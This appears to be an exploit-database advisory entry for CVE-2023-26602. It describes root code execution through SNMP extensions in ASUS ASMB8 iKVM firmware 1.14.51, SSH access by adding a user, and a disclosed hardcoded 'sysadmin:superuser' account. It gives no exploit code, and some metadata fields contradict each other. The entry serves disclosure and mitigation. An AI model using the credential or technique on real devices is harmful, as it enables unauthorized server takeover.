vendor:
ASMB8 iKVM
by:
d1g@segfault.net
8.1
CVSS
CRITICAL
Remote Code Execution (RCE) & SSH Access
94
CWE
Product Name: ASMB8 iKVM
Affected Version From: ASMB8 iKVM Firmware <= 1.14.51
Affected Version To: ASMB8 iKVM Firmware 1.14.51 (inclusive)
Patch Exists: NO
Related CWE: CVE-2023-26602
CPE: h:asus:asmb8_ikvm_firmware:1.14.51
Platforms Tested: Linux
2023
ASUS ASMB8 iKVM 1.14.51 – Remote Code Execution (RCE) & SSH Access
A vulnerability was found in ASUS ASMB8 iKVM firmware version 1.14.51 and possibly others, allowing for Remote Code Execution (RCE) via SNMP arbitrary extensions. By exploiting this vulnerability, an attacker can run commands on the system with root privileges and introduce a new user to bypass SSH restrictions. Additionally, a hardcoded account 'sysadmin:superuser' was discovered. The vulnerability is identified as CVE-2023-26602.
Mitigation:
To mitigate this vulnerability, it is recommended to update the firmware to a version higher than 1.14.51. Additionally, disable SNMPv2 and change any default or hardcoded credentials.